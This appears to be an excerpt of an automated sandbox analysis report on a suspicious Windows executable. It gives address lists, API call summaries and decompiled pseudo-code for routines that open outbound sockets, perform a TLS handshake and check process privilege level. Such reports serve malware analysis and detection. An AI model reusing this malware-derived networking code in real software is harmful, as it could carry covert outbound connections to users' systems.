                        0x00404b84
                        0x00404b89
                        0x00404b9c
                        0x00404bc1
                        0x00404bca
                        0x00404bd2
                        0x00404be2
                        0x00404be2
                        0x00404ac6
                        0x00404ac9
                        0x00404ac9
                        0x00404b70
                        0x00404ade
                        0x00404ae6
                        0x00404ae7
                        0x00404ae9
                        0x00404aeb
                        0x00404af1
                        0x00404af2
                        0x00404af4
                        0x00404af9
                        0x00404afb
                        0x00000000
                        0x00000000
                        0x00404afd
                        0x00000000
                        0x00000000
                        0x00404aff
                        0x00404b01
                        0x00404b06
                        0x00404b09
                        0x00404b0a
                        0x00404b0d
                        0x00404b12
                        0x00404b12
                        0x00404b14
                        0x00404b1b
                        0x00000000
                        0x00404b1b
                        0x00404b16
                        0x00404b19
                        0x00404b1f
                        0x00404b26
                        0x00404b36
                        0x00404b47
                        0x00404b6b
                        0x00000000
                        0x00404b6b
                        0x00000000
                        0x00404b19
                        0x00000000
                        0x00404b70
                        0x00404ac9
                        0x00404934
                        0x0040493a
                        0x00404941
                        0x0040494c
                        0x0040495a
                        0x00404966
                        0x00404966
                        0x00404970
                        0x00404976
                        0x00404977
                        0x0040497c
                        0x0040497f
                        0x00404986
                        0x00404990
                        0x004049a2
                        0x004049a7
                        0x004049a8
                        0x004049ab
                        0x00404992
                        0x00404992
                        0x00404997
                        0x00404998
                        0x0040499b
                        0x0040499b
                        0x004049c0
                        0x004049c8
                        0x004049c9
                        0x004049cb
                        0x004049d1
                        0x004049d2
                        0x004049d4
                        0x004049d6
                        0x004049de
                        0x004049e0
                        0x004049f0
                        0x004049f1
                        0x004049f6
                        0x004049f9
                        0x004049fe
                        0x00404a08
                        0x00404a12
                        0x00404a1c
                        0x00404a1e
                        0x00404a26
                        0x00404a27
                        0x00404a29
                        0x00404a2b
                        0x00404a33
                        0x00404a34
                        0x00404a39
                        0x00404a3c
                        0x00404a41
                        0x00404a41
                        0x004049de
                        0x00000000
                        0x00404986
                        0x00404921
                        0x00404928
                        0x00000000
                        0x00404928
                        0x004048f7
                        0x004048fb
                        0x00404906
                        0x0040490d
                        0x00000000
                        0x00404913
                        0x00404913
                        0x00000000
                        0x00404913

                        APIs
                        • ioctlsocket.WSOCK32(?,8004667E,00000001,?,?,00000010,?,?,00000004,?,?,00000004,?,?,00000004,?), ref: 0040497F
                        • connect.WSOCK32(?,00000002,00000010,?,8004667E,00000001,?,?,00000010,?,?,00000004,?,?,00000004,?), ref: 0040499B
                        • connect.WSOCK32(?,00000017,0000001C,?,8004667E,00000001,?,?,00000010,?,?,00000004,?,?,00000004,?), ref: 004049AB
                        • select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,0000000A,00000000,?,00000017,0000001C,?,8004667E,00000001), ref: 004049D6
                        • ioctlsocket.WSOCK32(?,8004667E,00000000,00000000,00000000,?,00000000,?,?,00000000,?,0000000A,00000000,?,00000017,0000001C), ref: 004049F9
                        • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00404A3C
                          • Part of subcall function 004060DF: getaddrinfo.WS2_32(?,00000000,?,?), ref: 00406127
                        • select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000064,00408089,00000032,00000005,0000000A,00408089,00000032), ref: 00404AF4
                        • recv.WSOCK32(?,?,0000FFFA,00000000,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000064,00408089,00000032), ref: 00404B0D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: connectioctlsocketselect$Ioctlgetaddrinforecv
                        • String ID: `
                        • API String ID: 3309496413-1850852036
                        • Opcode ID: 94832fd69148f78f34e3d37fb0042133a3bdae02baaadc7e367c89caf433b50a
                        • Instruction ID: 52abffb7202e3db3154f0e760f5a902c96039ff1b5ad81b7fdbe1a3602f91b5b
                        • Opcode Fuzzy Hash: 94832fd69148f78f34e3d37fb0042133a3bdae02baaadc7e367c89caf433b50a
                        • Instruction Fuzzy Hash: 21D160B1940208BAEF11EBE0CC41FEEBBB8AF04304F04846AF755B61D1D7796A54CB69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ioctlsocket.WS2_32(?,8004667E,00000001), ref: 00864BCF
                        • connect.WS2_32(?,00000002,00000010), ref: 00864BEB
                        • connect.WS2_32(?,00000017,0000001C), ref: 00864BFB
                        • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00864C26
                        • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 00864C49
                        • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00864C8C
                        • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00864D44
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: connectioctlsocketselect$Ioctl
                        • String ID: `
                        • API String ID: 2054606664-1850852036
                        • Opcode ID: 94832fd69148f78f34e3d37fb0042133a3bdae02baaadc7e367c89caf433b50a
                        • Instruction ID: b7468314551d86866480dc9a606793b8a86f3288089a7d36fc03ca841d8d53e1
                        • Opcode Fuzzy Hash: 94832fd69148f78f34e3d37fb0042133a3bdae02baaadc7e367c89caf433b50a
                        • Instruction Fuzzy Hash: 41D12C71900248BAEB21EBD4CC42FEEBBBCFF08700F114455F655E6191DB71AA58CB66
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 45%
                        			E004027BB(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
                        				char _v8;
                        				char _v16;
                        				char _v28;
                        				intOrPtr _v40;
                        				short _v42;
                        				char _v44;
                        				char _v300;
                        				char _v304;
                        				char _v308;
                        				char _t34;
                        				char* _t44;
                        				short _t46;
                        				char* _t52;
                        				void* _t57;
                        				void* _t58;
                        
                        				_t58 = __eflags;
                        				_t34 = E00406259( &_v308,  &_v16 - _t57);
                        				_push(6);
                        				_push(1);
                        				_push(2);
                        				L00406A3C();
                        				_v8 = _t34;
                        				E004061D2( &_v8, _a4, 4);
                        				_v304 = 1;
                        				_push(4);
                        				_push( &_v304);
                        				_push(1);
                        				_push(6);
                        				_push(_v8);
                        				L00406A30();
                        				E00406270(_a8, 0xffffffff,  &_v300);
                        				if(E0040616B(_t58,  &_v300) == 0) {
                        					_t44 = E004060DF(__eflags,  &_v300, 2);
                        					_push(_t44);
                        					L00406A12();
                        				} else {
                        					_t44 =  &_v300;
                        				}
                        				_push(_t44);
                        				L00406A0C();
                        				if(_t44 != 0) {
                        					_v40 = _t44;
                        					_t46 = _a12;
                        					if(_t46 > 0x10000) {
                        						_t46 = E004061EA(_t46);
                        					}
                        					_push(_t46);
                        					L00406A06();
                        					_v42 = _t46;
                        					_v44 = 2;
                        					_v304 = 1;
                        					_push( &_v304);
                        					_push(0x8004667e);
                        					_push(_v8);
                        					L00406A18();
                        					_push(0x10);
                        					_push( &_v44);
                        					_push(_v8);
                        					L00406A00();
                        					E0040621F(_v8, 0,  &_v28, _a16, 0);
                        					_push( &_v16);
                        					_push(0);
                        					_t52 =  &_v28;
                        					_push(_t52);
                        					_push(0);
                        					_push(0);
                        					L00406A24();
                        					if(_t52 == 1) {
                        						_v304 = 0;
                        						_push( &_v304);
                        						_push(0x8004667e);
                        						_push(_v8);
                        						L00406A18();
                        						_v308 = 1;
                        					}
                        				}
                        				return _v308;
                        			}


















                        0x004027bb
                        0x004027d2
                        0x004027d7
                        0x004027d9
                        0x004027db
                        0x004027dd
                        0x004027e2
                        0x004027ee
                        0x004027f3
                        0x004027fd
                        0x00402805
                        0x00402806
                        0x00402808
                        0x0040280a
                        0x0040280d
                        0x0040281e
                        0x00402831
                        0x00402844
                        0x00402849
                        0x0040284a
                        0x00402833
                        0x00402833
                        0x00402833
                        0x0040284f
                        0x00402850
                        0x00402857
                        0x0040285d
                        0x00402860
                        0x00402868
                        0x0040286b
                        0x0040286b
                        0x00402870
                        0x00402871
                        0x00402876
                        0x0040287a
                        0x00402880
                        0x00402890
                        0x00402891
                        0x00402896
                        0x00402899
                        0x0040289e
                        0x004028a3
                        0x004028a4
                        0x004028a7
                        0x004028ba
                        0x004028c2
                        0x004028c3
                        0x004028c5
                        0x004028c8
                        0x004028c9
                        0x004028cb
                        0x004028cd
                        0x004028d5
                        0x004028d7
                        0x004028e7
                        0x004028e8
                        0x004028ed
                        0x004028f0
                        0x004028f5
                        0x004028f5
                        0x004028d5
                        0x00402909

                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,?,?,00000003), ref: 004027DD
                        • setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?,00000003), ref: 0040280D
                        • inet_ntoa.WSOCK32(00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004,00000002), ref: 0040284A
                        • inet_addr.WSOCK32(00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004), ref: 00402850
                        • htons.WSOCK32(?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 00402871
                        • ioctlsocket.WSOCK32(?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?), ref: 00402899
                        • connect.WSOCK32(?,?,00000010,?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?), ref: 004028A7
                        • select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 004028CD
                        • ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 004028F0
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: ioctlsocket$connecthtonsinet_addrinet_ntoaselectsetsockoptsocket
                        • String ID:
                        • API String ID: 983927830-0
                        • Opcode ID: 44921d093b30c8dd2eefc5652d1f45c3759f6bc25d4c3193b64fbe321687dc0d
                        • Instruction ID: 3684afdf3ba0f9d3604e98d501ce8b12cc9c4396e628bfde8df08e9a0f24d3c6
                        • Opcode Fuzzy Hash: 44921d093b30c8dd2eefc5652d1f45c3759f6bc25d4c3193b64fbe321687dc0d
                        • Instruction Fuzzy Hash: 0D313E71A00218BADF10FBA1CD46FDE777DAB05318F0140AAF605B60D1D7B99A649F68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E00402D52(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                        				intOrPtr _v12;
                        				char _v16;
                        				long _v60;
                        				char _v64;
                        				intOrPtr _v108;
                        				void** _v112;
                        				intOrPtr _v116;
                        				void* _v120;
                        				void* _v124;
                        				intOrPtr _v128;
                        				void* _v132;
                        				char* _v136;
                        				intOrPtr _v140;
                        				void* _v144;
                        				void* _v148;
                        				void* _v152;
                        				void* _v156;
                        				char _v160;
                        				intOrPtr _v164;
                        				char _v168;
                        				char _v172;
                        				void* _v176;
                        				void* _v180;
                        				void* _v188;
                        				long* _t102;
                        				void* _t113;
                        				void* _t117;
                        				void** _t131;
                        				void* _t146;
                        
                        				E00406259( &_v188,  &_v16 - _t146);
                        				E00406259(_a12, 8);
                        				E00406259(_a16, 8);
                        				_v60 = 4;
                        				_v12 = 0x18;
                        				_push(0);
                        				_push(_a16);
                        				_push(0);
                        				_push(0);
                        				_t102 =  &_v60;
                        				_push(_t102);
                        				_push(0);
                        				_push(2);
                        				_push("Microsoft Unified Security Protocol Provider");
                        				_push(0);
                        				L00406A72();
                        				_t148 = _t102;
                        				if(_t102 != 0 || E004027BB(__edx, _t148,  &_v64, _a4, _a8, 0xa) == 0) {
                        					L28:
                        					__eflags = 0;
                        					return 0;
                        				} else {
                        					E004061D2( &_v64, _a20, 4);
                        					_v108 = 0xc11c;
                        					_v132 = 0;
                        					_v128 = 2;
                        					_v124 = 0;
                        					_v120 = 0;
                        					_v116 = 1;
                        					_v112 =  &_v132;
                        					_push(0);
                        					_push( &_v172);
                        					_push( &_v120);
                        					_push(_a12);
                        					_push(0);
                        					_push(0);
                        					_push(0x10);
                        					_push(0);
                        					_push(_v108);
                        					_push(_a4);
                        					_push(0);
                        					_push(_a16);
                        					L00406AA8();
                        					if(_v132 == 0 || _v124 == 0) {
                        						goto L28;
                        					} else {
                        						E00405E81(_v64, _v124, _v132, 0);
                        						_push(_v124);
                        						L00406A8A();
                        						_t113 = VirtualAlloc(0, 0x8000, 0x3000, 4);
                        						if(_t113 == 0) {
                        							goto L28;
                        						}
                        						_v176 = _t113;
                        						_v188 = 0x90312;
                        						_v180 = 0;
                        						while(_v188 == 0x90312 || _v188 == 0x80090318 || _v188 == 0x90320) {
                        							__eflags = _v180;
                        							if(__eflags == 0) {
                        								L8:
                        								_t117 = E00405F54(__eflags, _v64, _v176 + _v180, 0x8000 - _v180, 0xa);
                        								__eflags = _t117;
                        								if(_t117 == 0) {
                        									break;
                        								}
                        								__eflags = _t117;
                        								if(_t117 < 0) {
                        									break;
                        								}
                        								_t43 =  &_v180;
                        								 *_t43 = _v180 + _t117;
                        								__eflags =  *_t43;
                        								L11:
                        								_v132 = 0;
                        								_v128 = 2;
                        								_v124 = 0;
                        								_v120 = 0;
                        								_v116 = 1;
                        								_v112 =  &_v132;
                        								E004061D2( &_v180,  &_v168, 4);
                        								_v164 = 2;
                        								E004061D2( &_v176,  &_v160, 4);
                        								_v156 = 0;
                        								_v152 = 0;
                        								_v148 = 0;
                        								_v144 = 0;
                        								_v140 = 2;
                        								_v136 =  &_v168;
                        								_push(0);
                        								_push( &_v172);
                        								_push( &_v120);
                        								_push(0);
                        								_push(0);
                        								_t131 =  &_v144;
                        								_push(_t131);
                        								_push(0x10);
                        								_push(0);
                        								_push(_v108);
                        								_push(0);
                        								_push(_a12);
                        								_push(_a16);
                        								L00406AA8();
                        								_v188 = _t131;
                        								__eflags = _v188 - 0x80090318;
                        								if(_v188 == 0x80090318) {
                        									continue;
                        								}
                        								__eflags = _v188;
                        								if(_v188 < 0) {
                        									break;
                        								}
                        								__eflags = _v188;
                        								if(_v188 == 0) {
                        									L17:
                        									E00405E81(_v64, _v124, _v132, 0);
                        									_push(_v124);
                        									L00406A8A();
                        									L18:
                        									__eflags = _v188 - 0x90320;
                        									if(_v188 != 0x90320) {
                        										__eflags = _v152 - 5;
                        										if(_v152 != 5) {
                        											_v180 = 0;
                        										} else {
                        											E004061D2( &_v156,  &_v180, 4);
                        											E004061D2(_v176 + _v180 - _v156, _v176, _v156);
                        											_v188 = 0x90312;
                        										}
                        										continue;
                        									}
                        									break;
                        								}
                        								__eflags = _v188 - 0x90312;
                        								if(_v188 != 0x90312) {
                        									goto L18;
                        								}
                        								__eflags = _v132;
                        								if(_v132 == 0) {
                        									goto L18;
                        								}
                        								__eflags = _v124;
                        								if(_v124 == 0) {
                        									goto L18;
                        								}
                        								goto L17;
                        							}
                        							__eflags = _v188 - 0x80090318;
                        							if(__eflags != 0) {
                        								goto L11;
                        							}
                        							goto L8;
                        						}
                        						E00404681( &_v176);
                        						if(_v188 != 0) {
                        							goto L28;
                        						}
                        						return _v64;
                        					}
                        				}
                        			}
































                        0x00402d69
                        0x00402d73
                        0x00402d7d
                        0x00402d82
                        0x00402d89
                        0x00402d90
                        0x00402d92
                        0x00402d95
                        0x00402d97
                        0x00402d99
                        0x00402d9c
                        0x00402d9d
                        0x00402d9f
                        0x00402da1
                        0x00402da6
                        0x00402da8
                        0x00402dad
                        0x00402daf
                        0x004030c1
                        0x004030c1
                        0x00000000
                        0x00402dce
                        0x00402dd7
                        0x00402ddc
                        0x00402de3
                        0x00402dea
                        0x00402df1
                        0x00402df8
                        0x00402dff
                        0x00402e09
                        0x00402e0c
                        0x00402e14
                        0x00402e18
                        0x00402e19
                        0x00402e1c
                        0x00402e1e
                        0x00402e20
                        0x00402e22
                        0x00402e24
                        0x00402e27
                        0x00402e2a
                        0x00402e2c
                        0x00402e2f
                        0x00402e38
                        0x00000000
                        0x00402e48
                        0x00402e53
                        0x00402e58
                        0x00402e5b
                        0x00402e6e
                        0x00402e75
                        0x00000000
                        0x00000000
                        0x00402e7b
                        0x00402e81
                        0x00402e8b
                        0x00403077
                        0x00402e9a
                        0x00402ea1
                        0x00402eaf
                        0x00402ed2
                        0x00402ed2
                        0x00402ed4
                        0x00000000
                        0x00000000
                        0x00402eda
                        0x00402edd
                        0x00000000
                        0x00000000
                        0x00402ee3
                        0x00402ee3
                        0x00402ee3
                        0x00402ee9
                        0x00402ee9
                        0x00402ef0
                        0x00402ef7
                        0x00402efe
                        0x00402f05
                        0x00402f0f
                        0x00402f22
                        0x00402f27
                        0x00402f41
                        0x00402f46
                        0x00402f50
                        0x00402f5a
                        0x00402f64
                        0x00402f6e
                        0x00402f7e
                        0x00402f84
                        0x00402f8c
                        0x00402f90
                        0x00402f91
                        0x00402f93
                        0x00402f95
                        0x00402f9b
                        0x00402f9c
                        0x00402f9e
                        0x00402fa0
                        0x00402fa3
                        0x00402fa5
                        0x00402fa8
                        0x00402fab
                        0x00402fb0
                        0x00402fb6
                        0x00402fc0
                        0x00000000
                        0x00000000
                        0x00402fc6
                        0x00402fcd
                        0x00000000
                        0x00000000
                        0x00402fd3
                        0x00402fda
                        0x00402ff4
                        0x00402fff
                        0x00403004
                        0x00403007
                        0x0040300c
                        0x0040300c
                        0x00403016
                        0x0040301d
                        0x00403024
                        0x0040306d
                        0x00403026
                        0x0040303c
                        0x0040305c
                        0x00403061
                        0x00403061
                        0x00000000
                        0x00403024
                        0x00000000
                        0x00403018
                        0x00402fdc
                        0x00402fe6
                        0x00000000
                        0x00000000
                        0x00402fe8
                        0x00402fec
                        0x00000000
                        0x00000000
                        0x00402fee
                        0x00402ff2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402ff2
                        0x00402ea3
                        0x00402ead
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402ead
                        0x004030ae
                        0x004030ba
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004030bc
                        0x00402e38

                        APIs
                        • AcquireCredentialsHandleA.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000,?,00000008,?,00000008,?,?,00408566), ref: 00402DA8
                          • Part of subcall function 004027BB: socket.WSOCK32(00000002,00000001,00000006,?,?,?,?,00000003), ref: 004027DD
                          • Part of subcall function 004027BB: setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?,00000003), ref: 0040280D
                          • Part of subcall function 004027BB: inet_addr.WSOCK32(00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004), ref: 00402850
                          • Part of subcall function 004027BB: htons.WSOCK32(?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 00402871
                          • Part of subcall function 004027BB: ioctlsocket.WSOCK32(?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?), ref: 00402899
                          • Part of subcall function 004027BB: connect.WSOCK32(?,?,00000010,?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?), ref: 004028A7
                          • Part of subcall function 004027BB: select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 004028CD
                          • Part of subcall function 004027BB: ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 004028F0
                        • InitializeSecurityContextA.SECUR32(?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,?,00000000,?,?,00000004,?), ref: 00402E2F
                          • Part of subcall function 00405E81: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00405E9C
                          • Part of subcall function 00405E81: SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?), ref: 00405EF9
                        • FreeContextBuffer.SECUR32(?,?,?,?,00000000,?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,?), ref: 00402E5B
                        • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004,?,?,?,?,00000000,?,00000000,?,?,00000000,00000010,00000000), ref: 00402E6E
                        • InitializeSecurityContextA.SECUR32(?,?,00000000,?,00000000,00000010,?,00000000,00000000,?,?,00000000,?,?,00000004,?), ref: 00402FAB
                        • FreeContextBuffer.SECUR32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000010,?,00000000,00000000,?,?), ref: 00403007
                        Strings
                        • Microsoft Unified Security Protocol Provider, xrefs: 00402DA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Context$BufferFreeInitializeSecurityioctlsocket$AcquireAllocCredentialsEventHandleObjectSingleVirtualWaitconnecthtonsinet_addrselectsetsockoptsocket
                        • String ID: Microsoft Unified Security Protocol Provider
                        • API String ID: 1399349435-238809041
                        • Opcode ID: b57b27c6c8e695522797e75fc7b0b6995ce7901d83bb3699e4cc12d30d2fc88b
                        • Instruction ID: e99e4db1ca5d6ea21ef0783d4aa013bcaf674f9bf730a44bb7352d5b65d7dfdb
                        • Opcode Fuzzy Hash: b57b27c6c8e695522797e75fc7b0b6995ce7901d83bb3699e4cc12d30d2fc88b
                        • Instruction Fuzzy Hash: 98911A7190431CAEEF609F90CC45BDEBB79BB04709F1040AAE608B61D1CBB95A98DF56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • inet_addr.WS2_32(?), ref: 00862AA0
                        • htons.WS2_32(00000000), ref: 00862AC1
                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 00862AE9
                        • connect.WS2_32(?,?,00000010), ref: 00862AF7
                        • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00862B1D
                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 00862B40
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ioctlsocket$connecthtonsinet_addrselect
                        • String ID:
                        • API String ID: 2081129316-0
                        • Opcode ID: 44921d093b30c8dd2eefc5652d1f45c3759f6bc25d4c3193b64fbe321687dc0d
                        • Instruction ID: 4ff681899452161237ed9d6532d01fc8a58b4e3a6ce4cf9306985cb7814424c9
                        • Opcode Fuzzy Hash: 44921d093b30c8dd2eefc5652d1f45c3759f6bc25d4c3193b64fbe321687dc0d
                        • Instruction Fuzzy Hash: 77311971900258BADF20EBA4CD42FDEB77DFB08314F114095F644F6091EBB59AA48B6A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00866014
                        • LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086601E
                        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00866035
                        • GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00866045
                        • LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086605D
                        • CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00866065
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Free$AllocAuthorityCloseHandleInformationToken
                        • String ID:
                        • API String ID: 1586583212-0
                        • Opcode ID: 1707c921a7e8f55a14e19b09de659ca5eafb33d8be1dd96373c3de5dc21e3e34
                        • Instruction ID: 82d6e86566a3fecccc4fbb941be364e85f122c77205a533b9c50afac122a62a4
                        • Opcode Fuzzy Hash: 1707c921a7e8f55a14e19b09de659ca5eafb33d8be1dd96373c3de5dc21e3e34
                        • Instruction Fuzzy Hash: 6911F971D0014AFADF11ABE8CD42FEEBB79FF44314F158965B210F5091EB714A24ABA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0086563D
                          • Part of subcall function 00865FB8: LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00866014
                          • Part of subcall function 00865FB8: LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086601E
                          • Part of subcall function 00865FB8: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00866035
                          • Part of subcall function 00865FB8: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00866045
                          • Part of subcall function 00865FB8: LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086605D
                          • Part of subcall function 00865FB8: CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00866065
                        • GetLocalTime.KERNEL32(?,?,00000030,?,0086534E,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 008657D2
                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,0086534E,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 008657E5
                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,0086534E,?,00000014,?,00000000,00000001,00000000,00000018), ref: 00865816
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$Local$FileFreeSystem$AllocAuthorityCloseHandleInformationInitializeToken
                        • String ID: 0
                        • API String ID: 1744783010-4108050209
                        • Opcode ID: a1c780bd0feac9ba66404310acbc0efb7393dd46e94ea136f93f2a61d3938f50
                        • Instruction ID: 8f794fdd4a27580df6310987cf754b762330f083c0f6b2d8520accb3c5e278bb
                        • Opcode Fuzzy Hash: a1c780bd0feac9ba66404310acbc0efb7393dd46e94ea136f93f2a61d3938f50
                        • Instruction Fuzzy Hash: 62A1E4B5900618AFDB20DB94CC85FDAB3BCFF48304F1140E6E608E7251DA75AA85CF69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040662B(CHAR* _a4, void* _a8, long _a12, long _a16, long _a20) {
                        				void* _v8;
                        				long _v12;
                        				long _t12;
                        
                        				while(1) {
                        					_t12 = CreateFileA(_a4, 0x40000000, 0, 0, _a16, 0x80, 0);
                        					_v8 = _t12;
                        					if(_t12 >= 0) {
                        						break;
                        					}
                        					_t12 = GetLastError();
                        					if(_t12 == 0x20) {
                        						continue;
                        					}
                        					break;
                        				}
                        				if(_v8 != 0xffffffff) {
                        					SetFilePointer(_v8, 0, 0, _a20);
                        					WriteFile(_v8, _a8, _a12,  &_v12, 0);
                        					return CloseHandle(_v8);
                        				}
                        				return _t12;
                        			}






                        0x00406634
                        0x0040664a
                        0x0040664f
                        0x00406654
                        0x00000000
                        0x00000000
                        0x00406656
                        0x0040665e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040665e
                        0x00406664
                        0x00406670
                        0x00406684
                        0x00000000
                        0x0040668c
                        0x00406695

                        APIs
                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 0040664A
                        • GetLastError.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00406656
                        • SetFilePointer.KERNEL32(?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00406670
                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000), ref: 00406684
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 0040668C
                        Memory Dump Source
